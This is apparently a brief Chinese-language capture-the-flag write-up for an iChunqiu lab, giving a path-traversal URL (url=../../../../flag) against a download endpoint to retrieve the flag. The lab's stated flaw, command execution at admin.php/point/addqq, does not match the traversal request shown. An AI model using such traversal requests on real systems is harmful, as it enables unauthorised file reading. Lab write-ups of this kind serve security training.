1.阅读靶场介绍
这里可以得到的有用信息就是
路径:admin.php/point/addqq
方法:存在任意命令执行漏洞
2.启动靶场
我们会得到一个如下的页面
接下来我们直接上poc,访问这个路径
eci-2zegea1j3i7cgoqtc8q8.cloudeci1.ichunqiu.com:80/index.php/bbs/index/download?url=../../../../flag&local=1&name
我们就能下载flag了
到此又要恭喜各位博主攻克一个靶场了
感谢你们宝贵的时间
期待博主攻克任何靶场的话,欢迎留言